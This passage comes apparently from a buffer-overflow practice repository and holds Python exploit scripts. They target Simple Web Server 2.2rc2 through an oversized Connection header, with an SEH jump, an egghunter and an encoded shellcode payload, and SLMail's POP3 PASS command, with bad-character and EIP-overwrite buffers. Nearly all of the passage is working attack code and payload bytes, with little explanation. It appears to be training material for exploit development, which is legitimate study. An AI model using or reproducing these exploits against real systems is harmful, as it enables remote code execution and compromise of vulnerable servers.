9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3" 16 | #junk = "A"*4992 17 | jmp = "B"*4 18 | retn = "C"*4 19 | shellcode = "" 20 | 21 | req = "GET / HTTP/1.1\r\n" 22 | req += "Host: 11.11.11.7\r\n" 23 | req += "Connection:" + junk + jmp + retn + shellcode + "\r\n" 24 | req += "\r\n" 25 | 26 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 27 | s.connect((ip, port)) 28 | s.send(req) 29 | s.close() 30 | -------------------------------------------------------------------------------- /simplewebserver/simplewebserver.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice/ef3426ace0f4c4fc9fce612eba811a9c8988bb66/simplewebserver/simplewebserver.exe -------------------------------------------------------------------------------- /simplewebserver/usingretshellcode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #################################################################### 4 | # Application: Simple Web Server 2.2rc2 # 5 | # Author: VOSEC # 6 | # Website: https://veilofsecurity.com # 7 | # Tested OS: Windows 7 SP1 32bit # 8 | #################################################################### 9 | 10 | import socket 11 | import sys 12 | 13 | ip = "11.11.11.7" 14 | port = 80 15 | junk = "A"*1491 16 | #junk = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3" 17 | #junk = "A"*4992 18 | jmp = "\xeb\xde\x90\x90" #nSEH - jmp -34 19 | egg = "W00TW00T" 20 | #retn = "C"*4 21 | 22 | retn = "\xb4\x10\xac\x6a" 23 | buf = "" 24 | buf += "\x89\xe2\xd9\xc9\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a" 25 | buf += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37" 26 | buf += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41" 27 | buf += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" 28 | buf += "\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x49\x78\x4b\x32" 29 | buf += "\x75\x50\x77\x70\x67\x70\x43\x50\x4d\x59\x7a\x45\x35" 30 | buf += "\x61\x39\x50\x35\x34\x4e\x6b\x30\x50\x36\x50\x4e\x6b" 31 | buf += "\x50\x52\x44\x4c\x4c\x4b\x63\x62\x37\x64\x6c\x4b\x52" 32 | buf += "\x52\x36\x48\x54\x4f\x38\x37\x50\x4a\x37\x56\x36\x51" 33 | buf += "\x4b\x4f\x6e\x4c\x37\x4c\x45\x31\x33\x4c\x66\x62\x74" 34 | buf += "\x6c\x77\x50\x6a\x61\x68\x4f\x76\x6d\x33\x31\x7a\x67" 35 | buf += "\x4a\x42\x4a\x52\x33\x62\x43\x67\x4c\x4b\x42\x72\x52" 36 | buf += "\x30\x4e\x6b\x62\x6a\x75\x6c\x6e\x6b\x52\x6c\x66\x71" 37 | buf += "\x51\x68\x4b\x53\x50\x48\x56\x61\x6b\x61\x36\x31\x6c" 38 | buf += "\x4b\x51\x49\x51\x30\x47\x71\x6a\x73\x4e\x6b\x47\x39" 39 | buf += "\x37\x68\x39\x73\x67\x4a\x70\x49\x6e\x6b\x75\x64\x6e" 40 | buf += "\x6b\x76\x61\x68\x56\x66\x51\x69\x6f\x4e\x4c\x4f\x31" 41 | buf += "\x6a\x6f\x34\x4d\x63\x31\x78\x47\x74\x78\x69\x70\x42" 42 | buf += "\x55\x49\x66\x76\x63\x73\x4d\x69\x68\x55\x6b\x71\x6d" 43 | buf += "\x77\x54\x64\x35\x69\x74\x71\x48\x4e\x6b\x70\x58\x75" 44 | buf += "\x74\x57\x71\x4b\x63\x43\x56\x4c\x4b\x76\x6c\x42\x6b" 45 | buf += "\x4c\x4b\x43\x68\x65\x4c\x35\x51\x4e\x33\x4c\x4b\x46" 46 | buf += "\x64\x6c\x4b\x56\x61\x58\x50\x6f\x79\x73\x74\x45\x74" 47 | buf += "\x74\x64\x71\x4b\x31\x4b\x31\x71\x53\x69\x61\x4a\x32" 48 | buf += "\x71\x69\x6f\x69\x70\x73\x6f\x63\x6f\x43\x6a\x6e\x6b" 49 | buf += "\x45\x42\x78\x6b\x4e\x6d\x31\x4d\x75\x38\x76\x53\x44" 50 | buf += "\x72\x35\x50\x55\x50\x65\x38\x72\x57\x42\x53\x66\x52" 51 | buf += "\x63\x6f\x53\x64\x31\x78\x50\x4c\x61\x67\x64\x66\x65" 52 | buf += "\x57\x4c\x49\x58\x68\x59\x6f\x4e\x30\x68\x38\x4a\x30" 53 | buf += "\x56\x61\x55\x50\x33\x30\x55\x79\x39\x54\x42\x74\x76" 54 | buf += "\x30\x62\x48\x56\x49\x6f\x70\x32\x4b\x55\x50\x69\x6f" 55 | buf += "\x6a\x75\x33\x5a\x34\x4a\x32\x48\x76\x6b\x54\x4b\x36" 56 | buf += "\x6b\x45\x52\x65\x38\x74\x42\x55\x50\x34\x51\x33\x6c" 57 | buf += "\x4c\x49\x38\x66\x32\x70\x62\x70\x46\x30\x72\x70\x33" 58 | buf += "\x70\x56\x30\x33\x70\x76\x30\x52\x48\x4a\x4a\x76\x6f" 59 | buf += "\x4b\x6f\x49\x70\x39\x6f\x79\x45\x4c\x57\x50\x6a\x42" 60 | buf += "\x30\x63\x66\x51\x47\x71\x78\x4d\x49\x4e\x45\x54\x34" 61 | buf += "\x30\x61\x4b\x4f\x7a\x75\x4c\x45\x39\x50\x70\x74\x54" 62 | buf += "\x4a\x69\x6f\x42\x6e\x54\x48\x70\x75\x38\x6c\x59\x78" 63 | buf += "\x52\x47\x57\x70\x63\x30\x55\x50\x33\x5a\x53\x30\x71" 64 | buf += "\x7a\x34\x44\x50\x56\x46\x37\x70\x68\x73\x32\x69\x49" 65 | buf += "\x6a\x68\x33\x6f\x79\x6f\x4e\x35\x4c\x43\x4a\x58\x57" 66 | buf += "\x70\x51\x6e\x77\x46\x6e\x6b\x44\x76\x61\x7a\x63\x70" 67 | buf += "\x75\x38\x73\x30\x44\x50\x75\x50\x57\x70\x36\x36\x53" 68 | buf += "\x5a\x73\x30\x72\x48\x30\x58\x4c\x64\x53\x63\x4a\x45" 69 | buf += "\x69\x6f\x79\x45\x7a\x33\x53\x63\x70\x6a\x57\x70\x73" 70 | buf += "\x66\x51\x43\x66\x37\x72\x48\x44\x42\x5a\x79\x48\x48" 71 | buf += "\x63\x6f\x4b\x4f\x59\x45\x4b\x33\x69\x68\x57\x70\x43" 72 | buf += "\x4d\x71\x38\x62\x78\x71\x78\x57\x70\x37\x30\x37\x70" 73 | buf += "\x63\x30\x31\x7a\x65\x50\x76\x30\x32\x48\x46\x6b\x44" 74 | buf += "\x6f\x56\x6f\x56\x50\x59\x6f\x79\x45\x52\x77\x42\x48" 75 | buf += "\x61\x65\x32\x4e\x50\x4d\x45\x31\x4b\x4f\x38\x55\x33" 76 | buf += "\x6e\x51\x4e\x79\x6f\x66\x6c\x56\x44\x44\x4f\x6f\x75" 77 | buf += "\x52\x50\x59\x6f\x49\x6f\x4b\x4f\x49\x79\x6f\x6b\x39" 78 | buf += "\x6f\x6b\x4f\x79\x6f\x55\x51\x68\x43\x44\x69\x58\x46" 79 | buf += "\x34\x35\x49\x51\x6f\x33\x6f\x4b\x6b\x4e\x34\x4e\x64" 80 | buf += "\x72\x4b\x5a\x73\x5a\x77\x70\x32\x73\x69\x6f\x49\x45" 81 | buf += "\x42\x4a\x57\x70\x48\x43\x41\x41" 82 | 83 | 84 | shellcode = buf 85 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 86 | 87 | req = "GET / HTTP/1.1\r\n" 88 | req += "Host: 11.11.11.7\r\n" 89 | req += "Connection:" + junk + egg + buf + egghunter + jmp + retn + "\r\n" 90 | req += "\r\n" 91 | 92 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 93 | s.connect((ip, port)) 94 | s.send(req) 95 | s.close() 96 | -------------------------------------------------------------------------------- /slmail/badchars.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | 5 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0d\x0e\x0f\x10" 6 | "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 7 | "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30" 8 | "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 9 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50" 10 | "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 11 | "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70" 12 | "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 13 | "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90" 14 | "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 15 | "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0" 16 | "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 17 | "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 18 | "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0" 19 | "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0" 20 | "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 21 | 22 | buffer = 'A' * 2606 + "B"*4 + badchars 23 | try: 24 | print "\nSending evil buffer..." 25 | s.connect(('11.11.11.7',110)) 26 | data = s.recv(1024) 27 | s.send('USER username' +'\r\n') 28 | data = s.recv(1024) 29 | s.send('PASS ' + buffer + '\r\n') 30 | s.close() 31 | print "\nDone!." 32 | except: 33 | print "Could not connect to POP3!" 34 | -------------------------------------------------------------------------------- /slmail/eipoverwrite.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4C